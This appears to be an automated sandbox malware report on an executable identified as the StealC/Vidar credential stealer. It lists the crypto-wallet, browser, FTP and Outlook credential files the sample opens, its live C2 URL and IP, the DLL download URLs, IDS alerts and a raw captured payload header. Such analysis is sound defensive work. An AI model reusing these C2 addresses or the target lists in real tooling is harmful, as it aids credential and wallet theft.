Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2365609973.0000000001465000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.v

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000002.2365609973.0000000001465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2089686437.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2364033932.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.5e0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.5e0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_005E9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_005EC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_005E7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_005E9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_005F8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005F4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_005EDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_005EE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_005EBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005E16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005EF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_005F3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005F38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_005F4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_005EED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005EDE10

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 